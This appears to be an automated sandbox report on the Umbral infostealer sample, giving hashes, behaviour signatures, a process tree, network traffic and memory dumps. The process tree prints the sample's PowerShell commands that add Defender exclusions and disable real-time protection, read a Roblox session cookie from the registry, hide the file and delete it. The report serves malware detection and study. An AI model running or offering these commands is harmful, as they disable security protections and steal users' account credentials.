Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    05-08-2024 15:26

General

  • Target

    Umbral.exe

  • Size

    231KB

  • MD5

    37040bc6e02b555d9062631211678bc9

  • SHA1

    cb2f4548ce9bd51ce42301ffa74130d9c6098ad5

  • SHA256

    3294164d79836fe3765e57e50dd0ac898164ccc049f097fb2deb2725478aa583

  • SHA512

    e5db52931152bef14e1dda82288a1f4265d79c4c4ad08f143994b2b60b2b530dfbcdcb1468bd70e5799a55b2a4f02565249e0d41944032bbd43a296757d9754c

  • SSDEEP

    6144:RloZM+rIkd8g+EtXHkv/iD4FxEe9rI8jB67NokR4cb8e1mtqpui:joZtL+EP8FxEe9rI8jB67NokRxuqR

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2508
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:2376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1992
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2164
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:1872
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2212
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1556
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:1508
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
          2⤵
          • Deletes itself
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1092
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1668

      Network

      • flag-us
        DNS
        gstatic.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        172.217.23.195
      • flag-us
        DNS
        gstatic.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
      • flag-nl
        GET
        https://gstatic.com/generate_204
        Umbral.exe
        Remote address:
        172.217.23.195:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Mon, 05 Aug 2024 15:27:10 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-nl
        GET
        https://gstatic.com/generate_204
        Umbral.exe
        Remote address:
        172.217.23.195:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Mon, 05 Aug 2024 15:28:08 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-us
        DNS
        ip-api.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        Umbral.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Mon, 05 Aug 2024 15:28:07 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 42
        X-Rl: 41
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        Umbral.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Mon, 05 Aug 2024 15:28:10 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 161
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        DNS
        discord.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.128.233
      • flag-us
        DNS
        discord.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
      • flag-us
        DNS
        discord.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
      • 172.217.23.195:443
        https://gstatic.com/generate_204
        tls, http
        Umbral.exe
        1.5kB
        4.9kB
        16
        11

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 172.217.23.195:443
        https://gstatic.com/generate_204
        tls, http
        Umbral.exe
        621 B
        572 B
        7
        5

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        Umbral.exe
        310 B
        267 B
        5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        Umbral.exe
        285 B
        510 B
        5
        4

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.138.232:443
        discord.com
        tls
        Umbral.exe
        345 B
        219 B
        5
        5
      • 8.8.8.8:53
        gstatic.com
        dns
        Umbral.exe
        114 B
        73 B
        2
        1

        DNS Request

        gstatic.com

        DNS Request

        gstatic.com

        DNS Response

        172.217.23.195

      • 8.8.8.8:53
        ip-api.com
        dns
        Umbral.exe
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        discord.com
        dns
        Umbral.exe
        171 B
        137 B
        3
        1

        DNS Request

        discord.com

        DNS Request

        discord.com

        DNS Request

        discord.com

        DNS Response

        162.159.138.232
        162.159.135.232
        162.159.137.232
        162.159.136.232
        162.159.128.233

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        fbe2b67bb3b86013da8d8cf2e9fe89bc

        SHA1

        d8de7ccc68024d275b24e2e3dd9aa52e77dde66f

        SHA256

        b5d6db00f75712561c86da22a18ddcbfbc2a07ed13826c2fd04e53b582604a45

        SHA512

        f4d96bec2ff4ad0dad70249f36a7e43547fd2dd360bc75ae83268e07b9dfa81c38ca9f23580c7692f0aad48f8c5e70652a2a23d21ea7adf919e2d950f08aa2df

      • memory/1556-45-0x0000000002240000-0x0000000002248000-memory.dmp

        Filesize

        32KB

      • memory/2608-17-0x0000000002390000-0x0000000002398000-memory.dmp

        Filesize

        32KB

      • memory/2608-16-0x000000001B630000-0x000000001B912000-memory.dmp

        Filesize

        2.9MB

      • memory/2972-10-0x00000000027F0000-0x00000000027F8000-memory.dmp

        Filesize

        32KB

      • memory/2972-9-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

        Filesize

        2.9MB

      • memory/3040-0-0x000007FEF5E83000-0x000007FEF5E84000-memory.dmp

        Filesize

        4KB

      • memory/3040-4-0x000007FEF5E80000-0x000007FEF686C000-memory.dmp

        Filesize

        9.9MB

      • memory/3040-3-0x000007FEF5E83000-0x000007FEF5E84000-memory.dmp

        Filesize

        4KB

      • memory/3040-2-0x000007FEF5E80000-0x000007FEF686C000-memory.dmp

        Filesize

        9.9MB

      • memory/3040-1-0x0000000000DD0000-0x0000000000E10000-memory.dmp

        Filesize

        256KB

      • memory/3040-49-0x000007FEF5E80000-0x000007FEF686C000-memory.dmp

        Filesize

        9.9MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.